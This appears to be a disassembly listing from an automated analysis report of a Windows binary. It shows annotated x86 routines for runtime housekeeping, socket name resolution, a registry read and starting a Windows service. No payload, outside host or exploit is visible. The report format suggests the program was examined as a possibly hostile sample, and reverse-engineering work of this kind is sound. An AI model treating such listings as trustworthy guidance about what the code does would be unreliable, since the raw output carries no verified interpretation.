00405492 cmp eax, 00000105h
00405497 jnle 004054EEh
00405499 mov byte ptr [ebp+ebx-0000024Fh], 0000005Ch
004054A1 mov eax, 00000105h
004054A6 sub eax, ebx
004054A8 dec eax
004054A9 push eax
004054AA lea eax, dword ptr [ebp-0000011Eh]
004054B0 push eax
004054B1 lea eax, dword ptr [ebp-0000024Fh]
004054B7 add eax, ebx
004054B9 inc eax
004054BA push eax
004054BB call 00401290h
004054C0 lea eax, dword ptr [ebp-0000011Eh]
004054C6 push eax
004054C7 call 00401298h
004054CC inc eax
004054CD add ebx, eax
004054CF mov esi, edi
004054D1 cmp byte ptr [esi], 00000000h xrefs 0040542B
004054D4 jne 00405430h
004054DA mov eax, dword ptr [ebp-08h]
004054DD push eax
004054DE lea eax, dword ptr [ebp-0000024Fh]
004054E4 push eax
004054E5 mov eax, dword ptr [ebp-04h]
004054E8 push eax
004054E9 call 00401290h
004054EE mov eax, dword ptr [ebp-0Ch] xrefs 00405449, 00405478, 00405497, 004053DB, 004053F1, 00405404, 004053C7
004054F1 pop edi
004054F2 pop esi
004054F3 pop ebx
004054F4 mov esp, ebp
004054F6 pop ebp
004054F7 ret function end
APIs
  • InterlockedDecrement.KERNEL32, ref: 004059B0
Address Instruction Meta Information
004059A4 push ebp
004059A5 mov ebp, esp
004059A7 push ebx
004059A8 push esi
004059A9 mov ebx, dword ptr [ebp+08h]
004059AC lea eax, dword ptr [ebx+04h]
004059AF push eax
004059B0 call 004012F0h InterlockedDecrement@KERNEL32.DLL (Hidden Import)
004059B5 mov esi, eax
004059B7 test esi, esi
004059B9 jne 004059C4h
004059BB mov dl, 01h
004059BD mov eax, ebx
004059BF mov ecx, dword ptr [eax]
004059C1 call dword ptr [ecx-04h]
004059C4 mov eax, esi xrefs 004059B9
004059C6 pop esi
004059C7 pop ebx
004059C8 pop ebp
004059C9 retn 0004h function end
APIs
  • FormatMessageA.KERNEL32, ref: 0040A0DF
  • RtlGetLastWin32Error.NTDLL, ref: 0040BB5A
Address Instruction Meta Information
0040BB40 push ebp xrefs 0040BBE3, 00412ECC
0040BB41 mov ebp, esp
0040BB43 add esp, FFFFFFECh
0040BB46 push ebx
0040BB47 xor eax, eax
0040BB49 mov dword ptr [ebp-14h], eax
0040BB4C xor eax, eax
0040BB4E push ebp
0040BB4F push 0040BBD0h
0040BB54 push dword ptr fs:[eax]
0040BB57 mov dword ptr fs:[eax], esp
0040BB5A call 004061ACh RtlGetLastWin32Error@NTDLL.DLL (Hidden Import)
0040BB5F mov ebx, eax
0040BB61 test ebx, ebx
0040BB63 je 0040BB9Ch
0040BB65 mov dword ptr [ebp-10h], ebx
0040BB68 mov byte ptr [ebp-0Ch], 00000000h
0040BB6C lea edx, dword ptr [ebp-14h]
0040BB6F mov eax, ebx
0040BB71 call 0040A0C0h
0040BB76 mov eax, dword ptr [ebp-14h]
0040BB79 mov dword ptr [ebp-08h], eax
0040BB7C mov byte ptr [ebp-04h], 0000000Bh
0040BB80 lea eax, dword ptr [ebp-10h]
0040BB83 push eax
0040BB84 push 00000001h
0040BB86 mov ecx, dword ptr [0042B8D0h] 004064EC
0040BB8C mov dl, 01h
0040BB8E mov eax, dword ptr [00406FC8h] 00407014
0040BB93 call 0040A9C0h
0040BB98 mov edx, eax
0040BB9A jmp 0040BBB0h
0040BB9C mov ecx, dword ptr [0042B94Ch] 004064F4 xrefs 0040BB63
0040BBA2 mov dl, 01h
0040BBA4 mov eax, dword ptr [00406FC8h] 00407014
0040BBA9 call 0040A984h
0040BBAE mov edx, eax
0040BBB0 mov dword ptr [edx+0Ch], ebx xrefs 0040BB9A
0040BBB3 mov eax, edx
0040BBB5 call 00403DB8h
0040BBBA xor eax, eax
0040BBBC pop edx
0040BBBE pop ecx Count = 2
0040BBBF mov dword ptr fs:[eax], edx
0040BBC2 push 0040BBD7h
0040BBC7 lea eax, dword ptr [ebp-14h] xrefs 0040BBD5
0040BBCA call 004043DCh
0040BBCF ret function end
APIs
  • FormatMessageA.KERNEL32, ref: 0040A0DF
Address Instruction Meta Information
0040A0C0 push ebx xrefs 0040BB71, 0040D787, 00412366, 00412301, 004131EC, 004132ED
0040A0C1 add esp, FFFFFF00h
0040A0C7 mov ebx, edx
0040A0C9 push 00000000h
0040A0CB push 00000100h
0040A0D0 lea edx, dword ptr [esp+08h]
0040A0D4 push edx
0040A0D5 push 00000000h
0040A0D7 push eax
0040A0D8 push 00000000h
0040A0DA push 00003200h
0040A0DF call 0040614Ch FormatMessageA@KERNEL32.DLL (Hidden Import)
0040A0E4 jmp 0040A0E7h
0040A0E6 dec eax xrefs 0040A0F2, 0040A0F7
0040A0E7 test eax, eax xrefs 0040A0E4
0040A0E9 jle 0040A0F9h
0040A0EB mov dl, byte ptr [esp+eax-01h]
0040A0EF sub dl, 00000021h
0040A0F2 jc 0040A0E6h
0040A0F4 sub dl, 0000000Dh
0040A0F7 je 0040A0E6h
0040A0F9 mov edx, esp xrefs 0040A0E9
0040A0FB mov ecx, ebx
0040A0FD xchg eax, ecx
0040A0FE call 004044CCh
0040A103 add esp, 00000100h
0040A109 pop ebx
0040A10A ret function end
Address Instruction Meta Information
00404004 push ebp xrefs 004042C1, 0040404F, 004040AF
00404005 mov ebp, esp
00404007 push ebx
00404008 push esi
00404009 push edi
0040400A mov edi, 0042C630h
0040400F mov eax, dword ptr [edi+08h]
00404012 test eax, eax
00404014 je 0040405Eh
00404016 mov ebx, dword ptr [edi+0Ch]
00404019 mov esi, dword ptr [eax+04h]
0040401C xor edx, edx
0040401E push ebp
0040401F push 0040404Ah
00404024 push dword ptr fs:[edx]
00404027 mov dword ptr fs:[edx], esp
0040402A test ebx, ebx
0040402C jle 00404040h
0040402E dec ebx xrefs 0040403E
0040402F mov dword ptr [edi+0Ch], ebx
00404032 mov eax, dword ptr [esi+ebx*8+04h]
00404036 test eax, eax
00404038 je 0040403Ch
0040403A call eax
0040403C test ebx, ebx xrefs 00404038
0040403E jnle 0040402Eh
00404040 xor eax, eax xrefs 0040402C
00404042 pop edx
00404044 pop ecx Count = 2
00404045 mov dword ptr fs:[eax], edx
00404048 jmp 0040405Eh
0040405E pop edi xrefs 00404014, 00404048
0040405F pop esi
00404060 pop ebx
00404061 pop ebp
00404062 ret function end
APIs
  • ResetEvent.KERNEL32, ref: 00412EF6
  • WaitForSingleObject.KERNEL32, ref: 00412F06
  • InterlockedExchange.KERNEL32, ref: 00412FB7
Address Instruction Meta Information
00412F3C push ebp xrefs 00413586
00412F3D mov ebp, esp
00412F3F add esp, FFFFFFECh
00412F42 push ebx
00412F43 push esi
00412F44 push edi
00412F45 mov ebx, eax
00412F47 call 00406184h
00412F4C mov edx, dword ptr [0042B984h] 0042C030
00412F52 cmp eax, dword ptr [edx]
00412F54 je 00412F7Fh
00412F56 call 00406184h
00412F5B mov dword ptr [ebp-14h], eax
00412F5E mov byte ptr [ebp-10h], 00000000h
00412F62 lea eax, dword ptr [ebp-14h]
00412F65 push eax
00412F66 push 00000000h
00412F68 mov ecx, dword ptr [0042B8B8h] 0040F5AC
00412F6E mov dl, 01h
00412F70 mov eax, dword ptr [004100F0h] 0041013C
00412F75 call 0040A9C0h
00412F7A call 00403DB8h
00412F7F test ebx, ebx xrefs 00412F54
00412F81 jle 00412F8Ch
00412F83 mov eax, ebx
00412F85 call 00412EFCh
00412F8A jmp 00412F91h
00412F8C call 00412EF0h xrefs 00412F81
00412F91 xor eax, eax xrefs 00412F8A
00412F93 mov dword ptr [ebp-0Ch], eax
00412F96 push 0042C860h
00412F9B call 0040611Ch
00412FA0 xor eax, eax
00412FA2 push ebp
00412FA3 push 004130CAh
00412FA8 push dword ptr fs:[eax]
00412FAB mov dword ptr fs:[eax], esp
00412FAE mov eax, dword ptr [ebp-0Ch]
00412FB1 push eax
00412FB2 push 0042B3C4h
00412FB7 call 00406164h InterlockedExchange@KERNEL32.DLL (Hidden Import)
00412FBC mov dword ptr [ebp-0Ch], eax
00412FBF xor eax, eax
00412FC1 push ebp
00412FC2 push 004130ABh
00412FC7 push dword ptr fs:[eax]
00412FCA mov dword ptr fs:[eax], esp
00412FCD cmp dword ptr [ebp-0Ch], 00000000h
00412FD1 je 00412FDCh
00412FD3 mov eax, dword ptr [ebp-0Ch]
00412FD6 cmp dword ptr [eax+08h], 00000000h
00412FDA jnle 00412FE0h
00412FDC xor eax, eax xrefs 00412FD1
00412FDE jmp 00412FE2h
00412FE0 mov al, 01h xrefs 00412FDA
00412FE2 mov byte ptr [ebp-01h], al xrefs 00412FDE
00412FE5 cmp byte ptr [ebp-01h], 00000000h
00412FE9 je 00413095h
00412FEF jmp 00413088h
00412FF4 xor edx, edx xrefs 0041308F
00412FF6 mov eax, dword ptr [ebp-0Ch]
00412FF9 call 004106B0h
00412FFE mov dword ptr [ebp-08h], eax
00413001 xor edx, edx
00413003 mov eax, dword ptr [ebp-0Ch]
00413006 call 004105C0h
0041300B push 0042C860h
00413010 call 0040623Ch
00413015 xor eax, eax
00413017 push ebp
00413018 push 00413075h
0041301D push dword ptr fs:[eax]
00413020 mov dword ptr fs:[eax], esp
00413023 xor eax, eax
00413025 push ebp
00413026 push 00413046h
0041302B push dword ptr fs:[eax]
0041302E mov dword ptr fs:[eax], esp
00413031 mov eax, dword ptr [ebp-08h]
00413034 mov ebx, dword ptr [eax]
00413036 mov eax, dword ptr [ebx+0Ch]
00413039 call dword ptr [ebx+08h]
0041303C xor eax, eax
0041303E pop edx
00413040 pop ecx Count = 2
00413041 mov dword ptr fs:[eax], edx
00413044 jmp 0041305Dh
0041305D xor eax, eax xrefs 00413044
0041305F pop edx
00413061 pop ecx Count = 2
00413062 mov dword ptr fs:[eax], edx
00413065 push 0041307Ch
0041306A push 0042C860h xrefs 0041307A
0041306F call 0040611Ch
00413074 ret function end
00413088 mov eax, dword ptr [ebp-0Ch] xrefs 00412FEF
0041308B cmp dword ptr [eax+08h], 00000000h
0041308F jg 00412FF4h
00413095 xor eax, eax xrefs 00412FE9
00413097 pop edx
00413099 pop ecx Count = 2
0041309A mov dword ptr fs:[eax], edx
0041309D push 004130B2h
004130A2 mov eax, dword ptr [ebp-0Ch] xrefs 004130B0
004130A5 call 00403708h
004130AA ret function end
APIs
  • QueryPerformanceFrequency.KERNEL32, ref: 00414FF0
  • QueryPerformanceCounter.KERNEL32, ref: 00414FFA
  • GetTickCount.KERNEL32, ref: 00415018
Address Instruction Meta Information
00414FE8 add esp, FFFFFFF0h xrefs 00418634, 004186B6, 00418C06, 00418C68, 0041900B, 004190DD
00414FEB lea eax, dword ptr [esp+08h]
00414FEF push eax
00414FF0 call 00406254h QueryPerformanceFrequency@KERNEL32.DLL (Hidden Import)
00414FF5 test eax, eax
00414FF7 je 00415018h
00414FF9 push esp
00414FFA call 0040624Ch QueryPerformanceCounter@KERNEL32.DLL (Hidden Import)
00414FFF fild qword ptr [esp]
00415002 fild qword ptr [esp+08h]
00415006 fdivp st(1), st(0)
00415008 fmul dword ptr [00415024h]
0041500E call 00402A44h
00415013 and eax, FFFFFFFFh
00415016 jmp 0041501Dh
00415018 call 004061F4h GetTickCount@KERNEL32.DLL (Hidden Import) xrefs 00414FF7
0041501D add esp, 10h xrefs 00415016
00415020 ret function end
APIs
  • recvfrom.WS2_32, ref: 00413B67
Address Instruction Meta Information
00413B4C push ebp xrefs 00419D54
00413B4D mov ebp, esp
00413B4F push ecx
00413B50 push ebx
00413B51 mov dword ptr [ebp-04h], 0000001Ch
00413B58 lea ebx, dword ptr [ebp-04h]
00413B5B push ebx
00413B5C mov ebx, dword ptr [ebp+08h]
00413B5F push ebx
00413B60 mov ebx, dword ptr [ebp+0Ch]
00413B63 push ebx
00413B64 push ecx
00413B65 push edx
00413B66 push eax
00413B67 call dword ptr [0042B408h] recvfrom@WS2_32.DLL (Hidden Import)
00413B6D pop ebx
00413B6E pop ecx
00413B6F pop ebp
00413B70 retn 0008h function end
APIs
  • getaddrinfo.WS2_32, ref: 00413BEF
  • getaddrinfo.WS2_32, ref: 00413C32
  • getaddrinfo.WS2_32, ref: 00413C6B
  • getaddrinfo.WS2_32, ref: 00413C8E
  • FreeAddrInfoW.WS2_32, ref: 00413CCD
  • getprotobynumber.WS2_32, ref: 00413D9C
  • getservbyname.WS2_32, ref: 00413DB6
  • htons.WS2_32, ref: 00413DCB
  • inet_addr.WS2_32, ref: 00413E02
  • gethostbyname.WS2_32, ref: 00413E11
  • WSAGetLastError.WS2_32, ref: 00413E19
Address Instruction Meta Information
00413D24 push ebp xrefs 00418105
00413D25 mov ebp, esp
00413D27 add esp, FFFFFF78h
00413D2D push ebx
00413D2E push esi
00413D2F push edi
00413D30 mov dword ptr [ebp-08h], ecx
00413D33 mov dword ptr [ebp-04h], edx
00413D36 mov ebx, eax
00413D38 mov edi, dword ptr [ebp+10h]
00413D3B mov esi, dword ptr [ebp+14h]
00413D3E mov eax, dword ptr [ebp-04h]
00413D41 call 00404868h
00413D46 mov eax, dword ptr [ebp-08h]
00413D49 call 00404868h
00413D4E xor eax, eax
00413D50 push ebp
00413D51 push 00413F2Bh
00413D56 push dword ptr fs:[eax]
00413D59 mov dword ptr fs:[eax], esp
00413D5C xor eax, eax
00413D5E mov dword ptr [ebp-0Ch], eax
00413D61 mov eax, ebx
00413D63 xor ecx, ecx
00413D65 mov edx, 0000001Ch
00413D6A call 00403030h
00413D6F mov eax, esi
00413D71 call 00413B74h
00413D76 test al, al
00413D78 jne 00413E4Fh
00413D7E mov eax, dword ptr [0042C8A4h] 00960A4C
00413D83 call 00413914h
00413D88 xor edx, edx
00413D8A push ebp
00413D8B push 00413E48h
00413D90 push dword ptr fs:[edx]
00413D93 mov dword ptr fs:[edx], esp
00413D96 mov word ptr [ebx], 0002h
00413D9B push edi
00413D9C call dword ptr [0042B3E0h] getprotobynumber@WS2_32.DLL (Hidden Import)
00413DA2 mov esi, eax
00413DA4 xor eax, eax
00413DA6 test esi, esi
00413DA8 je 00413DBCh
00413DAA mov eax, dword ptr [esi]
00413DAC push eax
00413DAD mov eax, dword ptr [ebp-08h]
00413DB0 call 00404878h
00413DB5 push eax
00413DB6 call dword ptr [0042B3D4h] getservbyname@WS2_32.DLL (Hidden Import)
00413DBC test eax, eax xrefs 00413DA8
00413DBE jne 00413DD7h
00413DC0 xor edx, edx
00413DC2 mov eax, dword ptr [ebp-08h]
00413DC5 call 00407608h
00413DCA push eax
00413DCB call dword ptr [0042B424h] htons@WS2_32.DLL (Hidden Import)
00413DD1 mov word ptr [ebx+02h], ax
00413DD5 jmp 00413DDFh
00413DD7 mov ax, word ptr [eax+08h] xrefs 00413DBE
00413DDB mov word ptr [ebx+02h], ax
00413DDF mov eax, dword ptr [ebp-04h] xrefs 00413DD5
00413DE2 mov edx, 00413F48h
00413DE7 call 004047C4h
00413DEC jne 00413DF7h
00413DEE mov dword ptr [ebx+04h], FFFFFFFFh
00413DF5 jmp 00413E30h
00413DF7 mov eax, dword ptr [ebp-04h] xrefs 00413DEC
00413DFA call 00404878h
00413DFF mov edi, eax
00413E01 push edi
00413E02 call dword ptr [0042B420h] inet_addr@WS2_32.DLL (Hidden Import)
00413E08 mov esi, eax
00413E0A mov dword ptr [ebx+04h], esi
00413E0D inc esi
00413E0E jne 00413E30h
00413E10 push edi
00413E11 call dword ptr [0042B3E4h] gethostbyname@WS2_32.DLL (Hidden Import)
00413E17 mov esi, eax
00413E19 call dword ptr [0042B3D0h] WSAGetLastError@WS2_32.DLL (Hidden Import)
00413E1F mov dword ptr [ebp-0Ch], eax
00413E22 test esi, esi
00413E24 je 00413E30h
00413E26 mov eax, dword ptr [esi+0Ch]
00413E2B mov eax, dword ptr [eax] Count = 2
00413E2D mov dword ptr [ebx+04h], eax
00413E30 xor eax, eax xrefs 00413E0E, 00413E24, 00413DF5
00413E32 pop edx
00413E34 pop ecx Count = 2
00413E35 mov dword ptr fs:[eax], edx
00413E38 push 00413F10h
00413E3D mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 00413E4D
00413E42 call 0041391Ch
00413E47 ret function end
00413E4F lea eax, dword ptr [ebp-30h] xrefs 00413D78
00413E52 xor ecx, ecx
00413E54 mov edx, 00000020h
00413E59 call 00403030h
00413E5E lea eax, dword ptr [ebp-50h]
00413E61 xor ecx, ecx
00413E63 mov edx, 00000020h
00413E68 call 00403030h
00413E6D mov byte ptr [ebp-0Dh], 00000000h
00413E71 test esi, esi
00413E73 jne 00413EA3h
00413E75 cmp byte ptr [ebp+08h], 00000000h
00413E79 je 00413E8Fh
00413E7B mov dword ptr [ebp-2Ch], 00000002h
00413E82 mov dword ptr [ebp-4Ch], 00000017h
00413E89 mov byte ptr [ebp-0Dh], 00000001h
00413E8D jmp 00413EA6h
00413E8F mov dword ptr [ebp-4Ch], 00000002h xrefs 00413E79
00413E96 mov dword ptr [ebp-2Ch], 00000017h
00413E9D mov byte ptr [ebp-0Dh], 00000001h
00413EA1 jmp 00413EA6h
00413EA3 mov dword ptr [ebp-2Ch], esi xrefs 00413E73
00413EA6 mov eax, dword ptr [ebp+0Ch] xrefs 00413EA1, 00413E8D
00413EA9 mov dword ptr [ebp-28h], eax
00413EAC mov eax, edi
00413EAE mov dword ptr [ebp-24h], eax
00413EB1 mov edx, dword ptr [ebp-28h]
00413EB4 mov dword ptr [ebp-48h], edx
00413EB7 mov dword ptr [ebp-44h], eax
00413EBA lea eax, dword ptr [ebp-6Ch]
00413EBD push eax
00413EBE lea ecx, dword ptr [ebp-30h]
00413EC1 mov edx, dword ptr [ebp-08h]
00413EC4 mov eax, dword ptr [ebp-04h]
00413EC7 call 00413B90h
00413ECC mov dword ptr [ebp-0Ch], eax
00413ECF mov edi, ebx
00413ED1 lea esi, dword ptr [ebp-6Ch]
00413ED4 mov ecx, 00000007h
00413ED9 rep movsd
00413EDB test eax, eax
00413EDD je 00413F10h
00413EDF cmp byte ptr [ebp-0Dh], 00000000h
00413EE3 je 00413F10h
00413EE5 lea eax, dword ptr [ebp-00000088h]
00413EEB push eax
00413EEC lea ecx, dword ptr [ebp-50h]
00413EEF mov edx, dword ptr [ebp-08h]
00413EF2 mov eax, dword ptr [ebp-04h]
00413EF5 call 00413B90h
00413EFA mov dword ptr [ebp-0Ch], eax
00413EFD test eax, eax
00413EFF jne 00413F10h
00413F01 mov edi, ebx
00413F03 lea esi, dword ptr [ebp-00000088h]
00413F09 mov ecx, 00000007h
00413F0E rep movsd
00413F10 xor eax, eax xrefs 00413EDD, 00413EE3, 00413EFF
00413F12 pop edx
00413F14 pop ecx Count = 2
00413F15 mov dword ptr fs:[eax], edx
00413F18 push 00413F32h
00413F1D lea eax, dword ptr [ebp-08h] xrefs 00413F30
00413F20 mov edx, 00000002h
00413F25 call 00404400h
00413F2A ret function end
APIs
  • RegOpenKeyExA.ADVAPI32, ref: 004035CA
  • RegQueryValueExA.ADVAPI32, ref: 004035FD
  • RegCloseKey.ADVAPI32, ref: 00403613
Strings
  • FPUMaskValue, va: 0040365C
Address Instruction Meta Information
004035A8 push ebp xrefs 00405EE2
004035A9 mov ebp, esp
004035AB add esp, FFFFFFF4h
004035AE movzx eax, word ptr [0042B024h]
004035B5 mov dword ptr [ebp-08h], eax
004035B8 lea eax, dword ptr [ebp-04h]
004035BB push eax
004035BC push 00000001h
004035BE push 00000000h
004035C0 push 00403640h
004035C5 push 80000002h
004035CA call 004012B0h RegOpenKeyExA@ADVAPI32.DLL (Hidden Import)
004035CF test eax, eax
004035D1 jne 00403620h
004035D3 xor eax, eax
004035D5 push ebp
004035D6 push 00403619h
004035DB push dword ptr fs:[eax]
004035DE mov dword ptr fs:[eax], esp
004035E1 mov dword ptr [ebp-0Ch], 00000004h
004035E8 lea eax, dword ptr [ebp-0Ch]
004035EB push eax
004035EC lea eax, dword ptr [ebp-08h]
004035EF push eax
004035F2 push 00000000h Count = 2
004035F4 push 0040365Ch ASCII "FPUMaskValue"
004035F9 mov eax, dword ptr [ebp-04h]
004035FC push eax
004035FD call 004012B8h RegQueryValueExA@ADVAPI32.DLL (Hidden Import)
00403602 xor eax, eax
00403604 pop edx
00403606 pop ecx Count = 2
00403607 mov dword ptr fs:[eax], edx
0040360A push 00403620h
0040360F mov eax, dword ptr [ebp-04h] xrefs 0040361E
00403612 push eax
00403613 call 004012A8h RegCloseKey@ADVAPI32.DLL (Import)
00403618 ret function end
00403620 mov ax, word ptr [0042B024h] 1332 xrefs 004035D1
00403626 and ax, 0000FFC0h
0040362A mov dx, word ptr [ebp-08h]
0040362E and dx, 003Fh
00403632 or ax, dx
00403635 mov word ptr [0042B024h], ax
0040363B mov esp, ebp
0040363D pop ebp
0040363E ret function end
APIs
  • InterlockedIncrement.KERNEL32, ref: 00412F29
Address Instruction Meta Information
00412F24 push 0042C878h xrefs 004131BB
00412F29 call 0040616Ch InterlockedIncrement@KERNEL32.DLL (Hidden Import)
00412F2E ret function end
APIs
  • htons.WS2_32, ref: 00414056
  • htons.WS2_32, ref: 00414067
Address Instruction Meta Information
00414038 push esi xrefs 004181CB
00414039 push edi
0041403A add esp, FFFFFFE4h
0041403D mov esi, eax
0041403F lea edi, dword ptr [esp]
00414042 mov ecx, 00000007h
00414047 rep movsd
00414049 cmp word ptr [esp], 0017h
0041404E jne 00414061h
00414050 mov ax, word ptr [esp+02h]
00414055 push eax
00414056 call dword ptr [0042B40Ch] htons@WS2_32.DLL (Hidden Import)
0041405C movzx eax, ax
0041405F jmp 00414070h
00414061 mov ax, word ptr [esp+02h] xrefs 0041404E
00414066 push eax
00414067 call dword ptr [0042B40Ch] htons@WS2_32.DLL (Hidden Import)
0041406D movzx eax, ax
00414070 add esp, 1Ch xrefs 0041405F
00414073 pop edi
00414074 pop esi
00414075 ret function end
APIs
  • TlsSetValue.KERNEL32, ref: 00405FE5
  • TlsGetValue.KERNEL32, ref: 00406022
Address Instruction Meta Information
00405FEC mov cl, byte ptr [0042C65Ch] 00 xrefs 00402813, 004027B8, 00413679, 004027F3, 0040275A, 00402768, 00402776, 00402871, 0040287C, 00403BA8, 00403DEB, 00403BD5, 00403D31, 00403D5D, 00403E34
00405FF2 mov eax, dword ptr [0042B0C4h] 00000000
00405FF7 test cl, cl
00405FF9 jne 00406021h
00405FFB mov edx, dword ptr fs:[0000002Ch]
00406002 mov eax, dword ptr [edx+eax*4]
00406005 ret function end
00406006 call 00405FA8h xrefs 00406029
0040600B mov eax, dword ptr [0042B0C4h] 00000000
00406010 push eax
00406011 call 00405F84h
00406016 test eax, eax
00406018 je 0040601Bh
0040601A ret function end
0040601B mov eax, dword ptr [0042C668h] 00000000 xrefs 00406018
00406020 ret function end
00406021 push eax xrefs 00405FF9
00406022 call 00405F84h TlsGetValue@KERNEL32.DLL (Hidden Import)
00406027 test eax, eax
00406029 je 00406006h
0040602B ret function end
APIs
  • SetFilePointer.KERNEL32, ref: 004078F2
Address Instruction Meta Information
004078D0 push ebp xrefs 004121EA
004078D1 mov ebp, esp
004078D3 add esp, FFFFFFF8h
004078D6 push ebx
004078D7 push esi
004078D8 mov esi, edx
004078DA mov ebx, eax
004078DC mov eax, dword ptr [ebp+08h]
004078DF mov dword ptr [ebp-08h], eax
004078E2 mov eax, dword ptr [ebp+0Ch]
004078E5 mov dword ptr [ebp-04h], eax
004078E8 push esi
004078E9 lea eax, dword ptr [ebp-04h]
004078EC push eax
004078ED mov eax, dword ptr [ebp-08h]
004078F0 push eax
004078F1 push ebx
004078F2 call 00406284h SetFilePointer@KERNEL32.DLL (Hidden Import)
004078F7 mov dword ptr [ebp-08h], eax
004078FA mov eax, dword ptr [ebp-08h]
004078FD mov edx, dword ptr [ebp-04h]
00407900 pop esi
00407901 pop ebx
00407903 pop ecx Count = 2
00407904 pop ebp
00407905 retn 0008h function end
APIs
  • SetEvent.KERNEL32, ref: 00412F1E
Address Instruction Meta Information
00412F18 mov eax, dword ptr [0042C848h] 00000048 xrefs 00413159, 0041340E
00412F1D push eax
00412F1E call 0040627Ch SetEvent@KERNEL32.DLL (Hidden Import)
00412F23 ret function end
Address Instruction Meta Information
0040BE34 push ebx
0040BE35 push esi
0040BE36 call 004039B8h
0040BE3B mov ebx, edx
0040BE3D mov esi, eax
0040BE3F mov eax, esi
0040BE41 call 0040BEC0h
0040BE46 mov edx, ebx
0040BE48 and dl, FFFFFFFCh
0040BE4B mov eax, esi
0040BE4D call 004036F8h
0040BE52 mov eax, dword ptr [esi+10h]
0040BE55 push eax
0040BE56 call 004060ECh
0040BE5B mov eax, dword ptr [esi+14h]
0040BE5E push eax
0040BE5F call 004060ECh
0040BE64 mov eax, dword ptr [esi+20h]
0040BE67 call 00403708h
0040BE6C test bl, bl
0040BE6E jle 0040BE77h
0040BE70 mov eax, esi
0040BE72 call 004039A0h
0040BE77 pop esi xrefs 0040BE6E
0040BE78 pop ebx
0040BE79 ret function end
APIs
  • gethostname.WS2_32, ref: 00413A9D
Address Instruction Meta Information
00413A60 push ebp xrefs 00419785
00413A61 mov ebp, esp
00413A63 push 00000000h
00413A65 push ebx
00413A66 mov ebx, eax
00413A68 xor eax, eax
00413A6A push ebp
00413A6B push 00413ACAh
00413A70 push dword ptr fs:[eax]
00413A73 mov dword ptr fs:[eax], esp
00413A76 mov eax, ebx
00413A78 call 004043DCh
00413A7D lea eax, dword ptr [ebp-04h]
00413A80 mov edx, 000000FFh
00413A85 call 004049A8h
00413A8A mov eax, dword ptr [ebp-04h]
00413A8D call 00404678h
00413A92 dec eax
00413A93 push eax
00413A94 mov eax, dword ptr [ebp-04h]
00413A97 call 00404878h
00413A9C push eax
00413A9D call dword ptr [0042B3ECh] gethostname@WS2_32.DLL (Hidden Import)
00413AA3 mov eax, dword ptr [ebp-04h]
00413AA6 call 00404878h
00413AAB mov edx, eax
00413AAD mov eax, ebx
00413AAF call 004045D4h
00413AB4 xor eax, eax
00413AB6 pop edx
00413AB8 pop ecx Count = 2
00413AB9 mov dword ptr fs:[eax], edx
00413ABC push 00413AD1h
00413AC1 lea eax, dword ptr [ebp-04h] xrefs 00413ACF
00413AC4 call 004043DCh
00413AC9 ret function end
APIs
  • InterlockedIncrement.KERNEL32, ref: 0040599A
Address Instruction Meta Information
00405990 push ebp
00405991 mov ebp, esp
00405993 mov eax, dword ptr [ebp+08h]
00405996 add eax, 04h
00405999 push eax
0040599A call 004012E8h InterlockedIncrement@KERNEL32.DLL (Hidden Import)
0040599F pop ebp
004059A0 retn 0004h function end
APIs
  • GetModuleHandleA.KERNEL32, ref: 0040BC12
  • GetProcAddress.KERNEL32, ref: 0040BC23
Strings
  • kernel32.dll, va: 0040BC44
  • GetDiskFreeSpaceExA, va: 0040BC54
Address Instruction Meta Information
0040BC0C push ebx xrefs 0040C530
0040BC0D push 0040BC44h ASCII "kernel32.dll"
0040BC12 call 004061CCh GetModuleHandleA@KERNEL32.DLL (Hidden Import)
0040BC17 mov ebx, eax
0040BC19 test ebx, ebx
0040BC1B je 0040BC2Dh
0040BC1D push 0040BC54h ASCII "GetDiskFreeSpaceExA"
0040BC22 push ebx
0040BC23 call 004061D4h GetProcAddress@KERNEL32.DLL (Import)
0040BC28 mov dword ptr [0042B154h], eax
0040BC2D cmp dword ptr [0042B154h], 00000000h xrefs 0040BC1B
0040BC34 jne 0040BC40h
0040BC36 mov eax, 00407A4Ch
0040BC3B mov dword ptr [0042B154h], eax
0040BC40 pop ebx xrefs 0040BC34
0040BC41 ret function end
APIs
  • OpenServiceA.ADVAPI32, ref: 00429B39
  • StartServiceA.ADVAPI32, ref: 00429B4D
  • QueryServiceStatus.ADVAPI32, ref: 00429B5C
Address Instruction Meta Information
00429B14 push ebx xrefs 00429EDD
00429B15 push esi
00429B16 push edi
00429B17 add esp, FFFFFFE0h
00429B1A mov esi, eax
00429B1C mov dword ptr [esp+08h], 00000001h
00429B24 push 00000001h
00429B28 push 00000000h Count = 2
00429B2A call 00421BC4h
00429B2F mov ebx, eax
00429B31 test ebx, ebx
00429B33 jle 00429B9Dh
00429B35 push 00000014h
00429B37 push esi
00429B38 push ebx
00429B39 call 00421B6Ch OpenServiceA@ADVAPI32.DLL (Hidden Import)
00429B3E mov esi, eax
00429B40 test esi, esi
00429B42 jle 00429B97h
00429B44 xor eax, eax
00429B46 mov dword ptr [esp], eax
00429B49 push esp
00429B4A push 00000000h
00429B4C push esi
00429B4D call 00421B74h StartServiceA@ADVAPI32.DLL (Hidden Import)
00429B52 test al, al
00429B54 je 00429B91h
00429B56 lea eax, dword ptr [esp+04h]
00429B5A push eax
00429B5B push esi
00429B5C call 00421BACh QueryServiceStatus@ADVAPI32.DLL (Hidden Import)
00429B61 test al, al
00429B63 je 00429B91h
00429B65 jmp 00429B8Ah
00429B67 mov edi, dword ptr [esp+18h] xrefs 00429B8F
00429B6B mov eax, dword ptr [esp+1Ch]
00429B6F push eax
00429B70 call 00421B84h
00429B75 lea eax, dword ptr [esp+04h]
00429B79 push eax
00429B7A push esi
00429B7B call 00421BACh
00429B80 test al, al
00429B82 je 00429B91h
00429B84 cmp edi, dword ptr [esp+18h]
00429B88 jnle 00429B91h
00429B8A cmp dword ptr [esp+08h], 04h xrefs 00429B65
00429B8F jne 00429B67h
00429B91 push esi xrefs 00429B54, 00429B63, 00429B82, 00429B88
00429B92 call 00421B64h
00429B97 push ebx xrefs 00429B42
00429B98 call 00421B64h
00429B9D cmp dword ptr [esp+08h], 04h xrefs 00429B33
00429BA2 sete al
00429BA5 add esp, 20h
00429BA8 pop edi
00429BA9 pop esi
00429BAA pop ebx
00429BAB ret function end
Address Instruction Meta Information
004020F4 push ebp xrefs 00402660
004020F5 mov ebp, esp
004020F7 add esp, FFFFFFF8h
004020FA push ebx
004020FB push esi
004020FC push edi
004020FD mov ebx, eax
004020FF cmp byte ptr [0042C5BCh], 00000000h
00402106 jne 00402111h
